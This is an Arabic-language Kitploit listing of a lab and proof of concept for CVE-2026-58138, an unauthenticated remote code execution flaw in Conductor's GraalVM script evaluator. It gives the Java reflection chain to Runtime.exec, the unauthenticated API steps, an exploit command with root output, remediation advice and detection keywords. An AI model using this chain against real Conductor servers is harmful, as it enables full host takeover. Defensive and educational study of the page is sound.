Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-58138-Conductor-Unauth-RCE — CVE-2026-58138 — Conductor (3.21.21..<3.30.2) RCE غير مصادق عليه عبر INLINE GraalVM evaluator (HostAccess.ALL). مختبر + PoC، تم التحقق منه e2e (root). | Kitploit
أدوات/GitHubGitHub/biitts/cve-2026-58138-conductor-unauth-rce
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubbiitts/cve-2026-58138-conductor-unauth-rce

CVE-2026-58138-Conductor-Unauth-RCE

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) RCE غير مصادق عليه عبر INLINE GraalVM evaluator (HostAccess.ALL). مختبر + PoC، تم التحقق منه e2e (root).

عرض المستودع
3منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-58138 — تنفيذ أوامر عن بُعد غير مصادق عليه عبر مُقيم GraalVM INLINE في Conductor

Conductor (OSS / Orkes) 3.21.21 … قبل 3.30.2 يُقيّم JavaScript المقدمة من المستخدم في مهام INLINE (و LAMBDA / DO_WHILE / SWITCH) بسياق GraalVM مبني بـ وصول كامل للمضيف (HostAccess.ALL). السكريبت يستخدم الانعكاس للوصول إلى java.lang.Runtime وينفذ أوامر النظام. واجهة API المجتمعية لا تحتاج مصادقة افتراضيًا، لذا فإن إرسال سير عمل بمثل هذه المهمة هو تنفيذ أوامر عن بُعد غير مصادق عليه.

CVECVE-2026-58138
إشعارvulncheck — تنفيذ أوامر عن بُعد غير مصادق عليه في Orkes Conductor عبر مُقيمات سكريبت GraalVM
المتأثرConductor 3.21.21 … قبل 3.30.2
الإصلاح3.30.2 (commits 87a7d96, c691e35)
التصنيفCWE-94 (حقن الكود) — صندوق الحماية متعدد اللغات GraalVM غير مفعل
CVSS9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
المصادقةلا شيء (واجهة API المجتمعية غير مصادق عليها افتراضيًا)
الحالةمؤكد — تم إعادة إنتاجه كـ جذر على conductoross/conductor:3.22.3

ملاحظة حول الإصدار (اقرأ هذا). تكوين المُقيم يختلف داخل النطاق المتأثر: الإصدارات حتى ~3.29.x (هذا المختبر يستخدم 3.22.3) تبني السياق بـ allowHostAccess(HostAccess.ALL) البسيط — التكوين غير المحمي الذي يصفه CVE، والذي يستغله هذا PoC مباشرة. خط 3.30.0/3.30.1 أضاف قائمة حظر جزئية denyAccess(...) (تم حظر الانعكاس)؛ الإصلاح الكامل (allowHostClassLoading(false) + تقوية المحرك) يصل فقط في 3.30.2. يستهدف PoC هذا تكوين HostAccess.ALL البسيط؛ وهو لا يدعي تجاوز قائمة حظر 3.30.1.


السبب الجذري

core/.../events/ScriptEvaluator.java (≤ 3.29.x / 3.22.3):

root@kitploit:~
return Context.newBuilder("js")
        .allowHostAccess(HostAccess.ALL)   // full host interop -> no sandbox
        .build();

HostAccess.ALL يسمح للسكريبت باستدعاء أي طريقة/حقل على كائنات المضيف Java. مهمة INLINE تربط مدخلاتها كـ $، وهو كائن Java حقيقي، لذا يمكن للسكريبت التنقل: $.getClass().getClass() → java.lang.Class → Class.forName("java.lang.Runtime") → Runtime.getRuntime().exec(...). مُقيم Python مكافئ (Context.newBuilder("python").allowAllAccess(true)).

الاستغلال

  1. تسجيل سير عمل تحمل مهمته INLINE التعبير الضار expression (POST /api/metadata/workflow، بدون مصادقة).
  2. تشغيله (POST /api/workflow/{name}، بدون مصادقة).
  3. مهمة INLINE تُقيّم JS؛ الانعكاس Runtime.exec ينفذ الأمر ويعيد PoC stdout كنتيجة للمهمة.

إعادة الإنتاج

root@kitploit:~
docker compose -f lab/docker-compose.yml up -d        # conductoross/conductor:3.22.3 (in range)
# wait ~60s for the all-in-one server to boot

python3 exploit.py http://127.0.0.1:8080 -c "id; hostname"

الملاحظ:

root@kitploit:~
[*] تسجيل سير عمل بمهمة INLINE ضارة (javascript) ... (بدون مصادقة)
[*] بدأ سير العمل id=...; قراءة مخرجات مهمة INLINE ...
[+] تم تأكيد RCE غير مصادق عليه - مخرجات الأوامر من مضيف Conductor:
uid=0(root) gid=0(root) groups=0(root)
vbox
Linux 6.18.12+kali-amd64

uid=0(root) هو مستخدم عملية Conductor؛ المخرجات هي حالة id/uname الحية — تنفيذ حقيقي، ليس صدى. يستخدم exploit.py مكتبة Python القياسية فقط.

التأثير

أي شخص قادر على الوصول إلى واجهة Conductor API يمكنه تنفيذ أوامر نظام عشوائية (هنا كـ جذر) على مضيف المنسق — اختراق كامل لمحرك سير العمل، وبياناته المستمرة/قوائم الانتظار، وكل نظام تلمسه سير العمل وبيانات الاعتماد المخزنة.

الإصلاح

  • الترقية إلى Conductor ≥ 3.30.2 (مُقيمات JS/Python لم تعد تعمل مع وصول المضيف / تحميل الفئات ممكّنًا).
  • دفاع متعمق: ضع المصادقة أمام واجهة Conductor API، وشغّل الخادم كمستخدم غير جذر بأقل صلاحيات، وقيد من يمكنه تسجيل/تشغيل سير العمل.

الكشف

وضع علامات على تعريفات سير العمل التي تحتوي مهام INLINE/LAMBDA/DO_WHILE/SWITCH فيها على سلاسل expression تشير إلى getClass، forName، Runtime، exec، ProcessBuilder، أو انعكاس java.، وعمليات Conductor التي تطلق شيلات.

انظر ANALYSIS.md لسلسلة الانعكاس، تكوين المُقيم عبر الإصدارات، والتصحيحات.


  • المؤلف: Caio Fabrício — github.com/BiiTts
  • يعود الفضل في الثغرة إلى المبلغ الأصلي / إشعار البائع؛ هذا المستودع هو مختبر مستقل وقابل للتكرار + PoC للاستخدام الدفاعي والتعليمي. للاختبار الأمني المصرح به فقط.
تنزيل الأداة